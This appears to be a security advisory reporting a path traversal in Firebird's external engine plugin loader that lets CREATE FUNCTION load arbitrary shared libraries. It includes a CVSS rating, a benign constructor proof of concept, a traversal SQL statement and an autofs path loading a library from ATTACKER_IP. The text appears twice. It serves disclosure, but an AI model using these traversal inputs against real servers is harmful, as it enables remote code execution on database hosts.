1. Summary
When a user runs CREATE FUNCTION ... ENGINE "<name>", Firebird takes the engine name and appends it to the plugins directory to build a filesystem path. It does not check for path separators or .. components, so dlopen() (or LoadLibraryEx() on Windows) ends up loading a shared library from anywhere on the filesystem, not just the plugins folder.
The loaded library's initialization code (constructors on Linux/macOS, DllMain on Windows) runs immediately during load, before Firebird even checks whether the module is a valid plugin. The SQL statement fails with a metadata error, but by that point the code from remote library has already executed inside the server process.
No special configuration makes this worse or better. Unlike the legacy UDF path, which has UdfAccess restrictions, the engine/plugin lookup path has no allowlist, no realpath() check, and no config option to lock it down.
This vulnerability becomes specially dangerous in a case when ExternalFileAccess parameter in firebird.conf is set to non-default value, enabling write to host's filesystem with later execution of written file.
2. CVSS
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H 10.0 Critical
| Metric |
Value |
Why |
| AV |
Network |
Reachable over the Firebird wire protocol (TCP 3050 by default) |
| AC |
Low |
One DDL statement, no race or special timing |
| PR |
Low |
Needs CREATE FUNCTION (commonly granted to app-level roles) |
| UI |
None |
Fully automated, no user clicks |
| S |
Changed |
Breaks out of SQL/DB context into the host OS |
| C / I / A |
High |
Full process-level access as the service account |
3. At a glance
|
|
| Bug class |
Path traversal (CWE-22) leading to code execution (CWE-94 / CWE-427) |
| Where |
CREATE FUNCTION ... ENGINE "<name>", the external engine plugin loader |
| Root cause |
The engine name is concatenated into plugins/<name> with no filtering of /, \, or .. |
| Who can trigger it |
Any user with CREATE FUNCTION (grants vary per deployment) |
| Platforms |
Linux, macOS, Windows |
| Config needed |
None, works against a default firebird.conf |
4. Tested against
5. How it works
The code path
- The engine name comes in as a quoted SQL identifier. Firebird does not restrict which characters are allowed here.
PluginLoadInfo in src/yvalve/PluginManager.cpp calls getPrefix(DIR_PLUGINS, engineName), which just does string concatenation: <install_root>/plugins/<engineName>.- That string goes straight to
dlopen(). The OS resolves .. segments, so the path walks right out of the plugins directory.
- Any constructor or init routine in the loaded library runs during
dlopen(), before Firebird checks for a _firebird_plugin symbol and rejects the module.
Why UdfAccess does not help
Firebird has long had path restrictions for legacy UDFs (UdfAccess = None | Restrict | Full). The engine/plugin loader does not go through that check. There is no equivalent setting for ENGINE names in affected versions.
What the attacker gets
Code execution as whatever OS account runs the Firebird process. That is typically firebird on bare-metal Linux, root in many container images, or SYSTEM on Windows services. From there it is straightforward to read databases, pivot, or persist.
Getting a library onto the target (practical notes)
- Simplest case: a shared object already exists at a known path (uploaded through an application, dropped in
/tmp by another process, etc.).
- On systems with autofs
-hosts maps (default on older macOS, common on enterprise Linux), an ENGINE path like ../../../../net/ATTACKER_IP/share/evil triggers a network mount. No file placement needed at all.
6. Minimal reproduction
Compile a tiny shared object with a constructor:
#include <stdio.h>
struct Marker {
Marker() { puts("<<< constructor executed >>>"); }
};
static Marker m;Then, from any SQL client connected as a user with CREATE FUNCTION:
create or alter function evil (val int) returns int
external name 'udf_compat!UC_frac'
engine "../../../../../../mnt/evil.so";
Running this in embedded mode (server normally swallows stdout & stderr) you will see <<< constructor executed >>> printed before the DDL fails with "Standard plugin entrypoint does not exist." The constructor already ran. That is the security impact.
VladimirEliTokarev Reporter
1. Summary
When a user runs
CREATE FUNCTION ... ENGINE "<name>", Firebird takes the engine name and appends it to the plugins directory to build a filesystem path. It does not check for path separators or..components, sodlopen()(orLoadLibraryEx()on Windows) ends up loading a shared library from anywhere on the filesystem, not just the plugins folder.The loaded library's initialization code (constructors on Linux/macOS,
DllMainon Windows) runs immediately during load, before Firebird even checks whether the module is a valid plugin. The SQL statement fails with a metadata error, but by that point the code from remote library has already executed inside the server process.No special configuration makes this worse or better. Unlike the legacy UDF path, which has
UdfAccessrestrictions, the engine/plugin lookup path has no allowlist, norealpath()check, and no config option to lock it down.This vulnerability becomes specially dangerous in a case when ExternalFileAccess parameter in firebird.conf is set to non-default value, enabling write to host's filesystem with later execution of written file.
2. CVSS
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H10.0 CriticalCREATE FUNCTION(commonly granted to app-level roles)3. At a glance
CREATE FUNCTION ... ENGINE "<name>", the external engine plugin loaderplugins/<name>with no filtering of/,\, or..CREATE FUNCTION(grants vary per deployment)firebird.conf4. Tested against
5. How it works
The code path
PluginLoadInfoinsrc/yvalve/PluginManager.cppcallsgetPrefix(DIR_PLUGINS, engineName), which just does string concatenation:<install_root>/plugins/<engineName>.dlopen(). The OS resolves..segments, so the path walks right out of the plugins directory.dlopen(), before Firebird checks for a_firebird_pluginsymbol and rejects the module.Why UdfAccess does not help
Firebird has long had path restrictions for legacy UDFs (
UdfAccess = None | Restrict | Full). The engine/plugin loader does not go through that check. There is no equivalent setting for ENGINE names in affected versions.What the attacker gets
Code execution as whatever OS account runs the Firebird process. That is typically
firebirdon bare-metal Linux,rootin many container images, orSYSTEMon Windows services. From there it is straightforward to read databases, pivot, or persist.Getting a library onto the target (practical notes)
/tmpby another process, etc.).-hostsmaps (default on older macOS, common on enterprise Linux), an ENGINE path like../../../../net/ATTACKER_IP/share/eviltriggers a network mount. No file placement needed at all.6. Minimal reproduction
Compile a tiny shared object with a constructor:
Then, from any SQL client connected as a user with
CREATE FUNCTION:Running this in embedded mode (server normally swallows stdout & stderr) you will see
<<< constructor executed >>>printed before the DDL fails with "Standard plugin entrypoint does not exist." The constructor already ran. That is the security impact.